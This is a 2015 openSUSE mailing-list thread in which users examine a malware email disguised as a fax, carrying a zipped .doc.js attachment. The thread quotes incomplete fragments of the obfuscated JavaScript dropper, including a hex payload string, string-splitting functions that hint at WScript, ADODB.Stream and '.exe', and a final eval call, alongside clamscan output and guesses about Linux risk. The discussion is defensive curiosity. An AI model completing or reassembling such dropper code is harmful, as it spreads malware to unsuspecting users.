[opensuse] I just got a bit of malware in the mail that might "work" on Linux.
Hi, I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension. It is a single line of probably javascript code. var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur Would this "work" on Linux? Somebody is interested in having a look at it? -- Cheers/Saludos Carlos E. R. (openSUSE Leap 42.1, test at Minas-Anor) -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R.
It is a single line of probably javascript code.
sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
* cagsm
On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R.
wrote: It is a single line of probably javascript code.
sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
Please use private mail if you wish to issue admonitions. The mail is *not* html, it is *text*. And since when is code not allowed? And, if you wish to jump on me, use private mail as I will not debate this further on-list. -- (paka)Patrick Shanahan Plainfield, Indiana, USA @ptilopteri http://en.opensuse.org openSUSE Community Member facebook/ptilopteri http://wahoo.no-ip.org Photo Album: http://wahoo.no-ip.org/gallery2 Registered Linux User #207535 @ http://linuxcounter.net -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On Mon, Nov 9, 2015 at 5:20 PM, Patrick Shanahan
* cagsm
[11-09-15 11:13]: On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R.
wrote: It is a single line of probably javascript code.
sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
Please use private mail if you wish to issue admonitions. The mail is *not* html, it is *text*. And since when is code not allowed?
And, if you wish to jump on me, use private mail as I will not debate this further on-list.
Where are you suddenly coming from? I replied to some carlos guy thread to the list. Also if the mail is text only then why worry what the text reads? Text email is text email. It cant be executed. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-09 17:36, cagsm wrote:
On Mon, Nov 9, 2015 at 5:20 PM, Patrick Shanahan <> wrote:
Where are you suddenly coming from? I replied to some carlos guy thread to the list. Also if the mail is text only then why worry what the text reads? Text email is text email. It cant be executed.
People, calm down :-) All email is text, even when it contains pictures. It is a text based protocol. :-p In this case, it contains a zipped attachment, which expands to something.doc.js. Ie, javascript text, which may be executed. Typically Linux tools do not attempt to execute programs coming by email, but it can be done with some insistent and clever clicking on the mouse. I never tried to execute it. So it did not execute. My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is) poses a real danger in Linux or not. Clamav does not signal it, and it is the only antivirus that currently has a Linux version that I know of. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is)
It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does. -- Per Jessen, Zürich (12.2°C) http://www.dns24.ch/ - your free DNS host, made in Switzerland. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-09 20:25, Per Jessen wrote:
Carlos E. R. wrote:
My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is)
It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.
Done, thanks. Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 2015-11-09 20:41, Carlos E. R. wrote:
On 2015-11-09 20:25, Per Jessen wrote:
It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.
Done, thanks.
Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.
It bounced from you: Diagnostic-Code: smtp; 552-5.7.0 This message was blocked because its content presents a potential 552-5.7.0 security issue. Please visit 552-5.7.0 https://support.google.com/mail/answer/6590 to review our message 552 5.7.0 content and attachment content guidelines. n19si3622488wjr.18 - gsmtp I also got another bounce from another machine; Time received: 11/9/2015 7:38:59 PM Message ID: <5640F64C.3040607@telefonica.net> Detections found: Message Body JS/Obfuscator.GX -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
On 2015-11-09 20:25, Per Jessen wrote:
Carlos E. R. wrote:
My question, not because it poses a danger to me, is whether this particular type of trojan (that's what I think it is)
It's not a trojan. It's javascript - to my knowledge, all javascript is run in sandboxes, even on Windows. Send me the whole thing and I'll tell you what it does.
Done, thanks.
Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.
I suppose so - still a trojan horse with greek soldiers that can't get out isn't much good :-) -- Per Jessen, Zürich (9.9°C) http://www.hostsuisse.com/ - virtual servers, made in Switzerland. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-10 08:24, Per Jessen wrote:
Carlos E. R. wrote:
Well, trojan is whatever thing that is sent disguised. The disguise is a Fax document.
I suppose so - still a trojan horse with greek soldiers that can't get out isn't much good :-)
LOL. Right. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 10/11/15 03:20, Patrick Shanahan wrote:
* cagsm
[11-09-15 11:13]: On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R.
wrote: It is a single line of probably javascript code. sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess. Please use private mail if you wish to issue admonitions.
Oh Patrick, you are a card! :-D . Would you call your post to cagsm a non-admonishing e-mail? 8-)
The mail is *not* html, it is *text*. And since when is code not allowed?
And, if you wish to jump on me, use private mail as I will not debate this further on-list.
R-i-g-h-t ... you will not debate this further on-list. Fair 'nuff in which case I will not further provoke your religious beliefs by making additional comments here in public. BC -- Using openSUSE 13.2, KDE 4.14.9 & kernel 4.3.0-1 on a system with- AMD FX 8-core 3.6/4.2GHz processor 16GB PC14900/1866MHz Quad Channel RAM Gigabyte AMD3+ m/board; Gigabyte nVidia GTX660 GPU -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 10/11/15 19:10, Basil Chupin wrote:
On 10/11/15 03:20, Patrick Shanahan wrote:
* cagsm
[11-09-15 11:13]: On Mon, Nov 9, 2015 at 4:57 PM, Carlos E. R.
wrote: It is a single line of probably javascript code. sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess. Please use private mail if you wish to issue admonitions.
Oh Patrick, you are a card! :-D .
Would you call your post to cagsm a non-admonishing e-mail? 8-)
The mail is *not* html, it is *text*. And since when is code not allowed?
And, if you wish to jump on me, use private mail as I will not debate this further on-list.
R-i-g-h-t ... you will not debate this further on-list. Fair 'nuff in which case I will not further provoke your religious beliefs by making additional comments here in public.
I have to report that Patrick and I have had an exchange of e-mails re this matter and while he would like to add some comments, but because he is a man of his word ( "...I will not debate this further on-list") he won't do so, which is something I applaud him for. (But it doesn't mean I won't kick you in the shin next time you step out of line, Patrick! :-) .) BC -- Using openSUSE 13.2, KDE 4.14.9 & kernel 4.3.0-1 on a system with- AMD FX 8-core 3.6/4.2GHz processor 16GB PC14900/1866MHz Quad Channel RAM Gigabyte AMD3+ m/board; Gigabyte nVidia GTX660 GPU -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 11/09/2015 05:04 PM, cagsm wrote:
sigh. please stop executing code in mails. mails are supposed to be text. text only ever since their invention. stop the html and other mess.
Who said I executed it? -- Cheers/Saludos Carlos E. R. (openSUSE Leap 42.1, test at Minas-Anor) -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 11/09/2015 05:57 PM, Carlos E. R. wrote: > Would this "work" on Linux? - mr Varnell of clamav list will probably know :............... regards -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-09 17:05, ellanios82 wrote: > On 11/09/2015 05:57 PM, Carlos E. R. wrote: >> Would this "work" on Linux? > - mr Varnell of clamav list will probably know :I guess I could post to that list. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 2015-11-09 20:02, Carlos E. R. wrote: > On 2015-11-09 17:05, ellanios82 wrote: >> On 11/09/2015 05:57 PM, Carlos E. R. wrote: >>> Would this "work" on Linux? >> - mr Varnell of clamav list will probably know :> > I guess I could post to that list. clamav does not see it as virii: cer@Telcontar:~/viruses/tmp> clamscan scan_00000810300.doc.js scan_00000810300.doc.js: OK ----------- SCAN SUMMARY ----------- Known viruses: 4091764 Engine version: 0.98.7 Scanned directories: 0 Scanned files: 1 Infected files: 0 Data scanned: 0.01 MB Data read: 0.00 MB (ratio 2.00:1) Time: 6.836 sec (0 m 6 s) cer@Telcontar:~/viruses/tmp> cer@Telcontar:~/viruses/tmp> file scan_00000810300.doc.js scan_00000810300.doc.js: ASCII text, with very long lines, with no line terminators cer@Telcontar:~/viruses/tmp> neither does antivir, an old version. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote: > On 2015-11-09 20:02, Carlos E. R. wrote: >> On 2015-11-09 17:05, ellanios82 wrote: >>> On 11/09/2015 05:57 PM, Carlos E. R. wrote: >>>> Would this "work" on Linux? >>> - mr Varnell of clamav list will probably know :>> >> I guess I could post to that list. > > clamav does not see it as virii: Given that it is javascript, it can't do much harm, at most it'll probably take you to a website. -- Per Jessen, Zürich (12.2°C) http://www.dns24.ch/ - your free DNS host, made in Switzerland. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-09 20:23, Per Jessen wrote:
Carlos E. R. wrote:
Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.
I don't know, it is code. I can't read javascript, but I'll have a guess at it. e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3(); That looks very ugly to me. But it may be only obfuscation. It seems to start with a declaration section: var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55"; function y5(){return 'xa.clo';}; function c8(){return 'jet.c';}; function n9(){return ' = WS';}; function r8(){return 'ODB.Str';}; function b8(){return 'eam"); ';}; function t7(){return 'cript';}; function a2(){return 'i++) { ';}; function v2(){return 'n(fn+n+';}; function g2(){return 'eObject';}; function n1(){return 'var b';}; function e9(){return '};';}; function u7(){return '; xa.w';}; function x1(){return 'tring';}; function y7(){return '); va';}; function b9(){return '".exe",';}; function i2(){return eval;}; which declares a lot of functions (like replacement macros in C, I guess). At the end, there is another section with the actual calls: e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l0(); You see, it is a funny way of obfuscating a script. The last command is: i2()(e7); which is probably the actual code, after creating an "e7" string with whatever it really wants to do. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
Carlos E. R. wrote:
On 2015-11-09 20:23, Per Jessen wrote:
Carlos E. R. wrote:
Given that it is javascript, it can't do much harm, at most it'll probably take you to a website.
I don't know, it is code. I can't read javascript, but I'll have a guess at it.
e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();
That looks very ugly to me. But it may be only obfuscation. It seems to start with a declaration section:
var
str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C505556555E55";
function y5(){return 'xa.clo';}; function c8(){return 'jet.c';}; function n9(){return ' = WS';}; function r8(){return 'ODB.Str';}; function b8(){return 'eam"); ';}; function t7(){return 'cript';}; function a2(){return 'i++) { ';}; function v2(){return 'n(fn+n+';}; function g2(){return 'eObject';}; function n1(){return 'var b';}; function e9(){return '};';}; function u7(){return '; xa.w';}; function x1(){return 'tring';}; function y7(){return '); va';}; function b9(){return '".exe",';};
function i2(){return eval;};
which declares a lot of functions (like replacement macros in C, I guess). At the end, there is another section with the actual calls:
e7+=n1();e7+=s2();e7+=s7();e7+=v4();e7+=r3();e7+=c6();e7+=o9();e7+=l ();
I guess you didn't post all of the code? Most of those functions aren't defined above. It looks similar to this: https://www.hybrid-analysis.com/sample/3af098f396af3e6f5d56107ba443546cddda2... My guess is that it'll take you to a website for downloading a trojan. -- Per Jessen, Zürich (10.2°C) http://www.hostsuisse.com/ - dedicated server rental in Switzerland. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-10 08:40, Per Jessen wrote:
I guess you didn't post all of the code?
No, certainly. I did not want to trigger filters. ;-)
Most of those functions aren't defined above. It looks similar to this:
https://www.hybrid-analysis.com/sample/3af098f396af3e6f5d56107ba443546cddda2...
Yes, exactly.
My guess is that it'll take you to a website for downloading a trojan.
My, what a complicated way... Would that work in Linux, or the target is Windows only? I saw a string mentioning ".exe". -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 11/09/2015 07:57 AM, Carlos E. R. wrote:
Hi,
I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.
It is a single line of probably javascript code.
var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur
Would this "work" on Linux? Somebody is interested in having a look at it?
I get a dozen of these a day in my spam trap. Its always in a zip or a pdf, or a fax of something miss-labeled. I seldom ever look at these at all, but they score low enough in spamassassin to get into the spam bin as opposed to being summarily junked by Amavisd. Anyway, I never touch them on a windows machine, do all my inspections on linux, and have never had one of these do anything, but then the only thing I do is LOOK at the contents of the zip. I can't imagine trying to execute one of these things, even as an experiment, even in a virtual machine. I can't imagine yours is special in any way, these things are everywhere, and anyone interested in researching these to see if they might work in linux has a boat load of them to work with. -- After all is said and done, more is said than done. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-09 19:36, John Andersen wrote:
On 11/09/2015 07:57 AM, Carlos E. R. wrote:
Anyway, I never touch them on a windows machine, do all my inspections on linux, and have never had one of these do anything, but then the only thing I do is LOOK at the contents of the zip.
Yes, same here, I looked out of curiosity. And I got interested when I saw that it seems to be javascript; Thunderbird, for instance, can execute javascript in email. Also it has no html. It is plain text. I don't get a lot of spam, anyway. Some days none at all. Thunderbird does not signal this one as bad, though, nor my ISP. Which is why I looked at it. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 11/09/2015 11:01 AM, Carlos E. R. wrote:
Thunderbird, for instance, can execute javascript in email.
It can, but doesn't by default. Who would turn that on? Pretty sure no one on this list ... ;-) - -- After all is said and done, more is said than done. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iEYEARECAAYFAlZA7kUACgkQv7M3G5+2DLLKlgCePFp4SRz1KUwH6fkEt7buepNr wSwAn26ORLzKqnhonCsEQ11asy3I3FNb =6Oxp -----END PGP SIGNATURE----- -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
On 2015-11-09 20:04, John Andersen wrote:
On 11/09/2015 11:01 AM, Carlos E. R. wrote:
Thunderbird, for instance, can execute javascript in email.
It can, but doesn't by default. Who would turn that on? Pretty sure no one on this list ... ;-)
Actually, many. Me, for instance. See, Thunderbird comes with a calendar thing by default nowdays, which you can sync with google by using "provider for Google Calendar". Well, this thing, at least when authenticating, requires javascript to be enabled. I know this for a fact because I had it disabled and it failed. (I don't care if Thunderbird has a calendar, but I do use a lot the Google calendar in my mobile phone. Being able to access it in the computer is very handy. Yes, I know I can do it via web too.) Thus I use this Thunderbird feature. And having javascript enabled scares me more than a bit. -- Cheers / Saludos, Carlos E. R. (from 13.1 x86_64 "Bottle" at Telcontar)
On 11/09/2015 10:57 AM, Carlos E. R. wrote:
Hi,
I just got a malware email (5 KB). It claims to be a FAX document, but of course it is not. It is zipped, thus not every tool would see it. When expanded, it contains a file with .doc.js extension.
It is a single line of probably javascript code.
var str="5552505E160B060D0A4A080D171005172410010801020B0A0D07054A0A01105E3C5E100A10031601010A174A070B095E17555E55505053545C50 5556555E55";function y5(){return 'xa.clo';};function c8(){return 'jet.c';};function n9(){return ' = WS';};function r8(){retur
Would this "work" on Linux? Somebody is interested in having a look at it?
I think you'd better hope that it _won't_ work on Linux! I looked at in Linux also, and just reading the file does no damage. I did not try to make it "work." I'm not crazy! --doug -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org To contact the owner, e-mail: opensuse+owner@opensuse.org
participants (8)
-
Basil Chupin
-
cagsm
-
Carlos E. R.
-
Doug
-
ellanios82
-
John Andersen
-
Patrick Shanahan
-
Per Jessen